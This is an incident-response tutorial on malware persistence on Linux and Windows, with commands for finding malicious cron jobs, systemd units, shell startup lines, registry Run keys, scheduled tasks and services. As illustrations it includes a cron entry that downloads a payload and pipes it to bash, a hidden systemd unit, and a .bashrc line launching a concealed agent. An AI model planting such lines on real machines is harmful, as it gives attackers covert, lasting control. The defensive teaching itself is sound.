Malware Persistence — cron, registry, services, and startup

Persistence is a malware’s ability to survive system reboots. After compromising a machine, the attacker installs a mechanism that re-executes the payload automatically. Knowing these entry points is essential for incident response.

Linux — common mechanisms

Malicious cron jobs

# Cron locations an attacker may modify
crontab -l                  # current user's cron
cat /etc/crontab            # system-wide cron
ls /etc/cron.d/             # cron fragments
ls /var/spool/cron/crontabs # per-user crons

# Example malicious entry:
*/5 * * * * root curl -s http://192.168.1.100/payload.sh | bash

Detection: compare crons against a baseline; monitor writes to /var/spool/cron with auditd.

Persistent systemd units

# Malicious service installed
cat /etc/systemd/system/updater.service

[Unit]
Description=System Updater

[Service]
ExecStart=/tmp/.hidden/agent
Restart=always

[Install]
WantedBy=multi-user.target

Find recently created units:

find /etc/systemd/system/ -newer /etc/passwd -name "*.service"
systemctl list-units --type=service --state=running

~/.bashrc and ~/.profile

# Line appended to .bashrc
echo "nohup /tmp/.cache/agent &>/dev/null &" >> ~/.bashrc

Review shell initialization files regularly.

Windows — common mechanisms

Registry Run Keys

The most exploited autorun keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# List autorun entries
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

Scheduled Tasks

# List all tasks
Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } |
  Select-Object TaskName, TaskPath, State

# Inspect a suspicious task
Export-ScheduledTask -TaskName "WindowsUpdate" | Out-String

Windows Services

# Services with binary in an unusual location
Get-WmiObject Win32_Service |
  Where-Object { $_.PathName -notlike "*System32*" -and $_.PathName -notlike "*Program Files*" } |
  Select-Object Name, PathName, StartMode

Startup folder

User:   C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
System: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\

Get-ChildItem "C:\Users\$env:USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

Detection tools

Linux:
  - chkrootkit / rkhunter — detect rootkits and modifications
  - auditd — monitor writes to sensitive locations
  - ls -la /tmp /dev/shm — malware's favorite directories

Windows:
  - Autoruns (Sysinternals) — shows ALL persistence points
  - Sysmon Event ID 13 — registry key write
  - Event ID 7045 — new service created

Incident response

1. Isolate the machine from the network
2. Take a snapshot / disk image
3. Identify and document the persistence mechanism
4. Remove the payload and the mechanism
5. Analyze the original entry vector — otherwise the attacker comes back

Never just remove the malware without understanding how it got in.